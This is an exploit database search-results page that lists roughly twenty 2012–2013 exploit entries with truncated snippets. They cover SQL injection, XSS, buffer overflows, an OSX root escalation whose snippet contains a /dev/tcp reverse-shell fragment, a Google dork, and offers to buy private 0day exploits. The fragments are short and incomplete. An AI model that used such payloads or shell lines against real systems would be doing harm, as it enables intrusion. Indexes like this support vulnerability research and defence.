Lucene search
+L

320 matches found

zdt
zdt
added 2013/08/30 12:0 a.m.24 views

OSX <= 10.8.4 - Local Root Priv Escalation (py)

Exploit for iOS platform in category local exploits !/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s...

6.7AI score
SaveExploits0
zdt
zdt
added 2013/07/03 12:0 a.m.19 views

Foliodrop a portfolio provider - Account Takeover (Edit/Remove) 0day

With this exploit, you can edit everything. Still there is no CVE or patch. 0day This is private exploit. You can buy it at https://0day.today...

7AI score
SaveExploits0
zdt
zdt
added 2013/07/03 12:0 a.m.27 views

Realtek Sound Manager AvRack (.wav) - Crash PoC

Exploit for windows platform in category dos / poc junk="\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2013/06/07 12:0 a.m.99 views

PHP Ticket System Beta 1 - Cross-Site Request Forgery

PHP Ticket System Beta 1 - Cross-Site Request Forgery 1. 2. 3. + Exploit Title : php ticket system csrf 4. + Author : Pablo '7days' Riberio 5. + Team: So Good Security 6. + Other 0days : http://pastebin.com/u/7days 7. + Version : = BETA 1 8. + Tested on : windows/internet explorer 9. + Details:...

0.2AI score
SaveExploits0
myhack58
myhack58
added 2013/05/23 12:0 a.m.47 views

The Windows kernel-EPATHOBJ 0day exploit-vulnerability warning-the black bar safety net

This vulnerability is through the PATHALLOCfor memory pressure of the test broke, the first use of PATHRECpointing to the same user space PATHREC EPATHOBJ::bFlatten it will”spin”for an unlimited linked list traversal. Such as:PathRecord-next = PathRecord; Although it will spin,but it will be by...

0.2AI score
SaveExploits0
zdt
zdt
added 2013/04/20 12:0 a.m.37 views

TP-LINK TL-WR741N / TL-WR741ND Denial Of Service

TP-LINK TL-WR741N / TL-WR741ND suffers from multiple remote denial of service device freezing conditions. FREEZING TP-LINK WEB INTERFACE Discovered by Daniel Henrique Negri Moreno a.k.a W1ckerMan Contact: w1ck3rmanatyahoo.com.br danielhnmorenoatgmail.com Vendor: TP-LINK Model No. TL-WR741N /...

7.1AI score
SaveExploits0
zdt
zdt
added 2013/04/12 12:0 a.m.34 views

MS13-009 Internet Explorer WScript.Shell Remote Code Execution

A security vulnerability in Internet Explorer, versions 6–9, allows an attacker to excute a malcious code This is private exploit. You can buy it at https://0day.today...

6.8AI score
SaveExploits0
zdt
zdt
added 2013/02/27 12:0 a.m.24 views

uTorrent 3.x app exploit 0day

Exploit for windows platform in category local exploits This is private exploit. You can buy it at https://0day.today...

6.8AI score
SaveExploits0
zdt
zdt
added 2013/02/21 12:0 a.m.32 views

e107 Persistant XSS vulnerability

Exploit for php platform in category web applications Exploit Title: E107 CMS Persistant XSS vulnerability Google Dork: "intitle:e107 powered website" | inurl:e107admin | ... Date: 18/02/2013 Exploit Author: Zyklon B Vendor Homepage: http://e107.org/ Software Link:...

7.1AI score
SaveExploits0
zdt
zdt
added 2013/02/11 12:0 a.m.22 views

FreeFloat FTP 1.0 Raw Commands Buffer Overflow

FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and execute arbitrary code when a long and invalid raw command is sent to it. import socket, struct, sys if lensys.argv 3: print "usage: %s IP port" % sys.argv0 sys.exit0 ip = sys.argv1 port = intsys.argv2 Bind shellcode generated...

8.3AI score
SaveExploits0
zdt
zdt
added 2013/02/02 12:0 a.m.27 views

ArrowChat 1.5.61 Cross Site Scripting / Local File Inclusion

ArrowChat versions 1.5.61 and below suffer from cross site scripting and local file inclusion vulnerabilities. Exploit Title: ArrowChat = 1.5.61 Multiple vulnerabilities Date: 01/01/2013 Exploit Author: Kallimero Vendor Homepage: http://www.sitexcms.org/ Version: 1.5.61, before, and maybe 1.6...

6.6AI score
SaveExploits0
myhack58
myhack58
added 2013/01/10 12:0 a.m.33 views

phpcms post_click injection 0day exploit code-exploit warning-the black bar safety net

Someone released a phpcmsv9 of 0day,feel free to write one using the code,wherein the injected code has two forms: 问题 函数 \phpcms\modules\poster\index.php public function posterclick $id = isset$GET'id' ? intval$GET'id' : 0; $r = $this-db-getonearray'id'=$id; if ! isarray$r && empty$r return false...

7.9AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/12/11 12:0 a.m.29 views

MyBB Bank v3 SQL Injection

Exploit Title: Bank v3 MyBB plugin SQLi 0day Exploit Author: RedHat NullSec Software Link: http://mods.mybb.com/download/bank-v3 Tested on: Windows & Linux. Vulnerable code : query"SELECT FROM ".TABLEPREFIX."users WHERE username='$user'"; $fetch=$db-fetcharray$queryr; ? The variable...

0.2AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/11/08 12:0 a.m.58 views

Invision Power Board 3.3.4 Unserialize REGEX Bypass

?php / So this is the patch that sanitizes, static public function safeUnserialize $serialized // unserialize will return false for object declared with small cap o // as well as if there is any ws between O and : if isstring $serialized && strpos $serialized, "\0" === false if strpos $serialized...

10CVSS0.6AI score0.26049EPSS
SaveExploits15
exploitpack
exploitpack
added 2012/10/07 12:0 a.m.25 views

MyAuth3 - Blind SQL Injection

MyAuth3 - Blind SQL Injection Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit Google Dork: allinurl:1881/?console=panel Date: 09/06/2011 Author: Marcio Almeida marcioatalligatorteamdot org | @marcioalm Version: 3.0 Tested on: Linux EDB-Note: apparently no true exploit ...

8.6AI score
SaveExploits0
zdt
zdt
added 2012/09/27 12:0 a.m.43 views

Joomla Component com_joomla_flash_uploader Remote File Upload

Exploit for php platform in category web applications -------------------------------------------------------------- Joomla Component comjoomlaflashuploader Remote File Upload ------------------------------------------------------------- Exploit Author = Zikou-16 My Facebook =...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2012/08/17 12:0 a.m.31 views

Inferno vBShout 2.5.2 - SQL Injection

==================================================================== Inferno vBShout SQLI 0day settings'scommands'; if $this-vbulletin-db-affectedrows vbulletin-db-queryfirst"select from " . TABLEPREFIX . "infernoshoutusers where suser='$this-vbulletin-userinfo'userid''" $this-vbulletin-db-query"...

5.3AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/07/02 12:0 a.m.26 views

Global Pixel SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 x Official Website: http://www.1337day.com 0 1 x...

0.2AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/06/29 12:0 a.m.19 views

Dharmatechnet SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 x Official Website: http://www.1337day.com 0 1 x...

0.3AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/06/20 12:0 a.m.28 views

Source Technology SQL Injection

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 x Official Website: http://www.1337day.com 0 1 x Support...

SaveExploits0
Rows per page
Query Builder